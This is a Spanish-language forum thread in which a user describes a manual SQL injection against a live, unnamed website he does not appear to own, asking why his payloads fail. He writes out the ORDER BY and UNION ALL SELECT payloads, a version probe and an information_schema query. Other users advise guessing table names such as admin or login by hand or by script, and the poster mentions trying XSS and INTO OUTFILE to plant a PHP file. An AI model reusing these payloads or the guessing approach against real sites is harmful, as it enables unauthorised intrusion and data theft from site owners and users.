Ayuda en una inyeccion sql

Iniciado por xustyx, 25 Junio 2011, 13:12 PM

0 Miembros y 1 Visitante están viendo este tema.

xustyx

Buenas a todos.

El otro dia me dio por hacer una inyeccion a una web sin fines satanicos solo para pobrar si era vulnerable y lo era.. pero me pasan varias cosas y tengo las dudas

1.- Empiezo con order: vuln.php?id=69+order+by+10 no error .... 15 error .... 12 error ..... 11 no error
vale es 11....

2.- vuln.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--
el servidor me tira ... Bad request ?¿?

3.- Añado "all" entre union y select y .... Hola me suelta las columnas vulnerables
vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--

4.- Miro la version de mysql: vuln.php?id=-1+union+all+select+1,@@version,2,3,4,5,6,7,8,9,10,11--   es 4.1.22

5.- Vamos ^^ vuln.php?id=-1+union+all+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables--
y en vez de salirme nada me sale un error otra vez ... dos en concreto

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhost/xxxxxxxx/home/html/vuln.php on line 40

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /var/www/vhost/xxxxxxxxx/home/html/vuln.php on line 105

He estado mirando y creo que puede ser que sea por que es MySql 4 pero bueno
Un saludo a todos y gracias :)

Shell Root

MySQL 4 no tiene information.schema, apartir del 5 la implementaron.
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

xustyx

Sips ya me imaginava que seria algo asi pero entonces las Tablas se sacan de la manga no? hay que ir probando ...

Cleantesdeasso

Buenas. Tienes q ir probando a mano, o hacerte un script  con los nombres de las supuestas tablas y asi no te aburres tanto: admin, user, username, login, tbluser, administration... No se si en el foro ya habia algo similar por ahi...
"Que no!! q el hash hay q crakiarlo!!"

Shell Root

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

xustyx

#5
Bueno el SQLi helper lo hace pero no me saca ninguna tabla :S

Y lo raro en la inyección es que si pongo alguna letra, como por ejemplo, +FROM
salen los dos errores .... que pongo @@datadir también.... que pongo hola también... no se por que pasa esto :S en cambio para ver si en hex me dejaba codifique hola en hex y salia hola y también, probé si podia hacer un XSS y codifique un script de alert para ver si lo metía y si que funcionaba, cargaba la pagina se veían los numeros 2,3,4,5.... y salia la ventanita del XSS.

Lo que pasa es por ejemplo si quiero poner el +from en hex no me deja :S o hacer into outfile para crear un archivo php el que sea ya que tengo el path entero del server :S...

Seguiré buscando ... ^^